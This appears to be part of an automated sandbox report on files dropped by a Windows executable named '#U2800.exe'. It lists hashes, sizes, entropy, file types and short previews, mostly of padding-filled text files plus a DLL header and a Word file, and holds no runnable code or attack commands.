                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2132), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2132
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk0:YS
                                                                                                                                                                                                        MD5:A8EA7DCED5BBF3A7EACA4BE6FC3C69C0
                                                                                                                                                                                                        SHA1:66A1A670CBD21E1B57CEB91B1710FB87F02E883C
                                                                                                                                                                                                        SHA-256:E28993D5E14BEDE58B01E7C8CFAD92FB366998EC71C633104A4294DDED44ABEC
                                                                                                                                                                                                        SHA-512:79E91DF9BFE5B10659145C12F8DACE857BA7A97D8AEC6C1A7A7096EEBA6F4D4B83260165A750B6CD0AA7C9ED35BB843676605A95B3D27DA455C8CBAA1F2A250B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1588), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1588
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkU:Yy
                                                                                                                                                                                                        MD5:7678E4059CFD6920F27E856CED0292BD
                                                                                                                                                                                                        SHA1:1C816474BBB2399C0938C8527C7A6A4FF09F5372
                                                                                                                                                                                                        SHA-256:C045AC9AEB1943BB030ABBB0055DF566228C30CA2AF01976A1DD40B4C6BDFC6D
                                                                                                                                                                                                        SHA-512:9DB749B310F2487789CCD2B84A1A9A540AB3DD95440175EB3C8F0C6486A199D3AEAB3B0A5796CD3F6BFF84D5B531221B2C97E778C8013C4436E575E947DB03C7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1149), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1149
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1:Yv
                                                                                                                                                                                                        MD5:53946D071ED97A5C8A372E48C94B26EE
                                                                                                                                                                                                        SHA1:BDDC087CD0A236E18878FA2DD091D729DB6D24CE
                                                                                                                                                                                                        SHA-256:380EECED03EAEBB9C79DA61CB8C7DA746D4560C24573FF4A2AF2DDF67B66280D
                                                                                                                                                                                                        SHA-512:C4C99F0DA45050CD69474E8E475B5F511724AC03BC008E3563E4910F1A727DDBBA406191AEE31AF260395CD8FFA22DC16A8B4E1F3562EDBD1DEFB924753E79B9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2935), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2935
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkz:Y9
                                                                                                                                                                                                        MD5:7B81926D0514386BA4B4B3CE6A5FCAE5
                                                                                                                                                                                                        SHA1:270B7D254DBD4FF9D3E88F72A00587FB6F992C61
                                                                                                                                                                                                        SHA-256:A503745D32DDBBCD83B224C5A63006F7EFCE894A6C92BFDA5929B24D4564EC2E
                                                                                                                                                                                                        SHA-512:E60B0A78B601438DD8A78043A149D4DE51102ED396528B402ED3EAD55F4D093F83907290C74E19CA7066D5E165707AD8622065ADD204D6DCC0B859916D7325FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1978), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1978
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkka:YI
                                                                                                                                                                                                        MD5:B7F7C02469481AB90DCEEA7F073AFCB9
                                                                                                                                                                                                        SHA1:11F4279113D854C32B0E169586012853256B35BA
                                                                                                                                                                                                        SHA-256:0DFA95446487CDA2C3D04B0A8AA5D8DA5E006206F248D413C94560A40D336B14
                                                                                                                                                                                                        SHA-512:825AFBA5B98D2EDF884C7BE54C61FA1015FAF4A0183E73E029910CA861B4EC00823C0E4B1C59EEC1BD0ECF48B6F220EE6BD20885E9434FDC5D19D15C8F1658BF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3731), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3731
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkX:YB
                                                                                                                                                                                                        MD5:ACE6EEE8B049CD71C82F84B299FA5604
                                                                                                                                                                                                        SHA1:70FCFE6130F41C57E1710C6A6BFD03F38DA8636E
                                                                                                                                                                                                        SHA-256:43491F776855E60CE8E5087334A6082D693CE55D51F200C5F1B20ED5E61D1990
                                                                                                                                                                                                        SHA-512:897AE0A681E2CF2164DEDBCEB5769B4197E4C9EEC68ED31C298B8810BBBB214B5428A3C98A55A35B1CFB4917B93A48A4234400F42BC904A0B62E6DE741BA9AEA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3768), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3768
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkI:YG
                                                                                                                                                                                                        MD5:D0F8DE0FF07F6CA53E0C56CA2A411D1D
                                                                                                                                                                                                        SHA1:54C761084DE4348F8CD62D1AD82741FEA4FF3243
                                                                                                                                                                                                        SHA-256:2B3CCC718DF67F3664EA437856E6776F03DC6679EAB7F8925CD66E2C046B30C4
                                                                                                                                                                                                        SHA-512:A4FE68D4E91996B87C8469A1F0B7535C51CD8DB7D8F0D88DE861AB4E9E33FF8D1E28F29FB04ECFB41E6EE6CED409A1326BA5586AF9817B940FFA9795EE5CB54F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1048), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1048
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkko:Ym
                                                                                                                                                                                                        MD5:3C6FCF1C23B09BF91E99D9080C6021B6
                                                                                                                                                                                                        SHA1:C74B22DCDC9CD100C10742C439D0BB7C8588F056
                                                                                                                                                                                                        SHA-256:6F35A61FE7EB497DEE36491FDB3F0E307A03E45EFB762C9DB852E466B9F55EFA
                                                                                                                                                                                                        SHA-512:B54D40DF82381C7E12E20391DEABF1088716C38EC46B590C4C4FC77F79F6BBD49EC485C7981B38765A74D5EA25F6A49E6F1E9DF5398EF3C72A458636A97463FF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1780736
                                                                                                                                                                                                        Entropy (8bit):6.54388973247121
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:izDLT7eXc2a+xMPDBsvh58j6OQ/K4eSlrIBizB2J4bJGtpxnvUmhEocQ0x58:iTTXkMPDjj6O0d1Z9sxnvU3Z
                                                                                                                                                                                                        MD5:B1A10828FADDCB586CC3A9C7A01CBBBF
                                                                                                                                                                                                        SHA1:1D7EF8581F731D77C9621045C0F2712D654EBEF0
                                                                                                                                                                                                        SHA-256:1D2D090188CD500EB6098701690A72F090440162A651123EAB44132525597446
                                                                                                                                                                                                        SHA-512:12171C09B03BB2E163561B9B7618B3EC8566D3162A2472A63661A1F86F26118272F3A7C6608C09640D57D992DE52A840DEB41B5EB089E19D35E45D08492ACACF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..B.........A......A......A...+..A............X...*..X......X...................N..........Rich...........................PE..d.....Xg.........." .....*................................................................`A.............................................$......(....`.......`..P............p...... _..T............................_..8............@...............................text....(.......*.................. ..`.rdata......@......................@..@.data............n..................@....pdata..P....`......."..............@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16036
